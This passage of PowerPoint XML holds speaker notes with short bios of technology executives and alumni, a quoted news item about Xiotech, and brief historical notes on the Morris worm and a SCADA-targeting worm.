                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5" tooltip="Polytechnic Institute of NYU"/>
              </a:rPr>
              <a:t>Polytechnic Institute of NYU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in 1980 and a master of science in Mechanical Engineering from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Columbia University</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> a year later.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>[4]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Burns first worked for Xerox in 1980 as a summer intern and joined a year later after her master's degree  Ann </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mulcahy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (previous CEO).</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Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Virginia M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Rometty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> IBM Global Business Services - Senior Vice President</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:45 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2947800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Gail Hamilton75 EECS Symantec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>seinor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> VP; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2003 Information Security Magazine recognized me as one of the “20 Women Luminaries” shaping the security industry.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  HP engineer designing logical analyzer, Atari, product marketing manager for HP fort Collins Unix. HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>telcom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> General </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> bay area. Compaq VP/General </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Telecom division Austin Texas </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Lisa Jesse, 93 MSCS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Lisa Jesse is a co-founder and Executive Vice President at Intelligent Software Solutions (ISS). For over six years, she managed the ISS Advanced Technology Division responsible for technology research and development.  In her role as a principal scientist, Ms. Jesse led strategic planning, business acquisition, management and execution of advanced technology R&amp;D programs for various government organizations including the Defense Advanced Research Projects Agency, Air Force Research Laboratory, National Security Agency and the Naval Air Systems Command. Currently, Ms. Jesse supports corporate strategic initiatives as well as manages community outreach programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="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David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gustavsson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Xiotech’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vice president of engineering.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> MSCS 2000</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>3/19/2011 Gazette News.</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“Using solid state (semiconductor-based) storage in conjunction with traditional disk drives means you no longer have to compromise between performance and capacity,” said David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gustavsson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Xiotech’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vice president of engineering, who earned a master’s degree in computer science at the University of Colorado at Colorado Springs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Read more: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gazette.com/articles/xiotech-114770-company-computer.html#ixzz1Ir8z4sKe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="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u="none" strike="noStrike" kern="1200" dirty="0" smtClean="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u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Darrel Judd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XioTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Principal Engineer.  BSCS 1994</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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Many members of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Xiotech’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> engineering team began their careers at Digital Equipment in the Springs, where they helped develop many of Digital’s early disk drives. After two mergers, Digital veteran Steve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sicola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> moved the team to disk-drive manufacturer Seagate Technology, which later sold the operation to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Xiotech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> after spending $100 million and five years developing the technology.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Read more: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.gazette.com/articles/xiotech-114770-company-computer.html#ixzz1Ir8ZBzBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:46 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2169073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2005 NTUEE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> alumni gathering pictures, please click to open.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Morris worm or Internet worm of November 2, 1988 was one of the first computer worms distributed via the Internet. It is considered the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>first worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>It targets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="Siemens"/>
              </a:rPr>
              <a:t>Siemens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="Industrial engineering"/>
              </a:rPr>
              <a:t>industrial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> software and equipment running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5" tooltip="Microsoft Windows"/>
              </a:rPr>
              <a:t>Microsoft Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Siemens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6" tooltip="SCADA"/>
              </a:rPr>
              <a:t>Supervisory Control And Data Acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (SCADA) system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Georgian President </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mikheil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
